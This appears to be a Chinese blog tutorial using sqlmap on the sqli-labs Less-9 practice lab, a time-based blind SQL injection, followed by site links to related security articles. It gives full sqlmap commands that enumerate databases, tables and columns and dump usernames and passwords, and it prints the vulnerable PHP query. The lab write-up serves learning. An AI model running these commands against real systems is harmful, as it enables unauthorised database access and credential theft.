網絡安全-sqlmap實戰之sqlilabs-Less9

原創 lady_killer9 2020-07-04 12:44

目錄

 

類型

-dbs枚舉數據庫

--tables枚舉數據庫表

--columns枚舉列

--dump枚舉數據

查看源代碼

類型

時間盲注-單引號

-dbs枚舉數據庫

使用-o參數優化,,--technique參數指定技術,--batch參數進行跳過

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch
過程
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch

太慢,繼續優化

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch
數據庫

這還運行了6分鐘,有小夥伴可以更快嗎?下方評論,十分感謝!

--tables枚舉數據庫表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch

--columns枚舉列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch

 

--dump枚舉數據

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch

 

查看源代碼

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

更多內容查看:網絡安全-自學筆記

有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

工信部爲“新基建”安全加把“鎖”

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 8月3日,工業和信息化部發布通知,要求開展2020年網絡安全技術應用試點示範工作。按照通知,2020年網絡安全技術應用試點示範選取的重點方向

雲棲號資訊小哥 2020-08-04 13:13:52

企業的數字化轉型如何面對網絡安全問題

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 網絡安全是公司進步和數字化轉型的較大障礙之一。自然,隨着新技術的出現,新的漏洞將使公司難以駕馭,尤其是在新的雲環境中。從法律上講,網絡安全設

雲棲號資訊小哥 2020-07-30 14:16:49

網絡安全的未來是否掌握在 AI 手中(三)

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! AI 提升網絡防禦系統安全級別 可能的網絡防禦系統應該至少提供三個級別的網絡安全。 第一級別包括傳統的靜態網絡防禦機制,如身份認證、密碼保護

雲棲號資訊小哥 2020-07-14 14:55:57

免責聲明,告知

本欄內容只供學習使用,如有違反法律,與本人無關。 在下載後24小時後,請及時刪除。 對可能危及普通公衆權益與自由的漏洞或技術運用或發佈應保持謹慎。 不應違背保護信息自由流動的底線。 請尊重版權信息,購買正版。 如本博客裏有錯誤出現,請

zhangguangyi888 2020-07-08 11:39:41

等保測評--通信網絡安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

等保測評--物理環境安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

記一次奇妙的某個edu滲透測試

前話: 對登錄方法的輕視造成一系列的漏洞出現,對接口確實鑑權造成大量的信息泄露。從小程序到web端網址的奇妙的測試就此開始。(文章厚碼,請見諒) 1. 尋找到目標站點的小程序 進入登錄發現只需要姓名加學工號就能成功登錄,通過google

原創 2024-04-16 22:46:34

關於SQL語句中最實用的總結

前言:很多開發人員在寫代碼、開發的過程中對一些SQL語句或者程序的細節並不在意,有的人即使知道優化的寫法可能也會認爲這一點點細節不會影響程序的整體效率的。 在此我想說明:一個開發有這種想法,就說明千千萬萬個開發有這種想法,衆多細小的問題在足

原創 2021-04-10 21:09:28

手把手教你用Python輕鬆玩轉SQL注入

點擊上方“ Python爬蟲與數據挖掘 ”,進行關注 回覆“書籍”即可獲贈Python從入門到進階共10本電子書 今 日 雞 湯 山有木兮木有枝,心悅君兮君不知。 前言 大

原創 2021-03-26 21:20:06

搭建SQLo靶機與練習

SQLol安裝 實驗器材:Window 7 windows 2008 下載地址:http://github.com/SpiderLabs/MCIR 安裝流程: Window2008配置: 解壓壓縮包到網站根路徑(例如,我新建一個sql目錄,

osc_n08oztl3 2021-01-30 11:08:45

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269)

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269) 靶機(server2003)上的配置: 點擊添加/刪除windows組件 找到應用程序服務器,點開 選中IIS信息服務器 確定,然後就安裝了 安裝完成之後 在管理工

osc_8r37p3dx 2021-01-30 11:02:38

Web 安全滲透方面的學習路線?

照例審下題,題主說對滲透感興趣並且想真正搞 Web 滲透方面,在問題描述中提到「看了好多道哥的白帽子書和烏雲(知識庫)」,但感覺自己「瞎折騰了很久,沒啥收穫」。 這個情況其實並不是書籍或其他學習資源出了問題,而是你本身的學習路線

吳偉祥 2021-01-30 10:48:01

DC-9靶機滲透詳解

查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 掃描dc-9端口 訪問80端口 查看wappalyzer dirb http://10.9

osc_t46alvdj 2021-01-30 10:41:49

ctfhub技能樹sql注入題sqlmap工具解法

ctfhub技能樹sql注入題sqlmap工具解法 有工具爲啥還要手動注入呢 整數注入 啓用sqlmap 列出庫名 可以看到 flag在 ‘sqli’庫中 再用sqlmap列出字段 再查詢flag字段就能拿到flag了

osc_ty60k6mi 2021-01-30 10:09:43

[網絡安全提高班] 一〇一.網絡攻防溯源普及和醫療數據安全總結

當您閱讀到該篇文章時,作者已經將“網絡安全自學篇”設置成了收費專欄,首先說聲抱歉。感謝這一年來大家的閱讀和陪伴,這100篇安全文章記錄了自己從菜雞到菜鳥的成長史,該部分知識也花了很多精力去學習和總結。由於在外讀書且需要養娃,所以按最低價9.

osc_j9qcf98f 2021-01-30 09:46:20